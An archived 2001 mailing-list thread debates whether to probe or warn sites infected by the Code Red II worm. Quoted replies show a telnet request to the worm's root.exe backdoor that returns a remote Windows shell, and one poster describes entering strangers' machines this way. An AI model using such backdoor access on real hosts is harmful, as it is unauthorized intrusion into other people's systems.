CR worm infection attempts
George Toft
plug-discuss@lists.PLUG.phoenix.az.us
Thu, 09 Aug 2001 08:03:37 -0700
If you are walking down the street, and see a house with the door
open, do you walk in to see if anyone is home? When you return, and
see the windows broken out, and the outside spray-painted, how do you
feel? I think this is a similar situation - if you walk in uninvited,
it's called "illegal entry" and you may be arrested. Likewise, testing
a site to see if it has been exploited is illegal as you were accessing
their computer in an unauthorized fashion.
Could you have stopped the crimes in both cases? Maybe (if the owner
listened to you). Is it worth the risk to you, your reputation, and
your family? No. I am not selfish - I am placing my family ahead of
strangers, and they rely upon my income. I suggest you do the same -
just keep on walking, and make sure you have the safeguards of Fort
Knox at home.
George
Derek Neighbors wrote:
>
> That is the problem.
>
> I looked at my logs out of curiosity. I was AMAZED at the figured. I
> took the first IP and hit it and checked for the root.exe exploit. Sure
> enough it was WIDE open.
>
> Now I had a DILEMMA on my hands. Do I notify this company or not? I had
> no malicous intent nor did I do anything. The 'good' in me wanted to
> notify them so that they were not 'toasted' by one will 'ill' intent.
>
> HOWEVER, I feared lawsuit, death and dismemberment. So I said not a word.
> I looked at thier website about 4 hours later and they were defaced. :(
>
> What kind of a world is it? I mean if I was walking down the street with
> my fly open, I would hope to God someone would tell me. However, I
> suppose even in that case you should be careful. I mean after all,
> noftifying someone that thier fly was open, means you were looking at
> thier crotch. If you were looking at their crotch you must have been
> wanting to rape them or harass them.
>
> Where does the silliness stop?
>
> -Derek
>
> On Wed, 8 Aug 2001, Kim Allen wrote:
>
> > I've been contacting the sites that my server logs shows that have been
> > hitting me with the code red signature and so far no one has bothered to
> > respond except for one. However that site has told me how secure they are
> > and how there is no way that they have any problems. When I sent them the
> > portions of my server logs showing they do have problem they threaten
> > legal action. Anyone else have had this type of response?
> >
> > > To answer your question... make sure you're hitting enter TWICE after
> > > the command.
> > >
> > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > Check it out:
> > >
> > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > Trying xxx.xxx.xxx.xxx...
> > > Connected to xxx.xxx.xxx.xxx.
> > > Escape character is '^]'.
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > HTTP/1.1 200 OK
> > > Server: Microsoft-IIS/5.0
> > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > Content-Type: application/octet-stream
> > > Microsoft Windows 2000 [Version 5.00.2195]
> > > (C) Copyright 1985-1999 Microsoft Corp.
> > >
> > > c:\inetpub\scripts>
> > >
> > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > > that explains how I did it, and why they need to pay attention to
> > > security patches. :)
> > >
> > > Hopefully they won't take it the 'wrong' way.
> > >
> > > ~g~
> > >
> > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > Wayne Conrad wrote:
> > > > >
> > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > keep recreating the same data each time.
> > > > >
> > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > Wayne
> > > > ________________________________________________
> > > >
> > > > I've been trying that out
> > > >
> > > > telnet ipaddress_from_my_httpd_access_log 80
> > > >
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > but I can't get a command prompt - what am I missing?
> > > >
> > > > Craig
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > >
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >
>
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss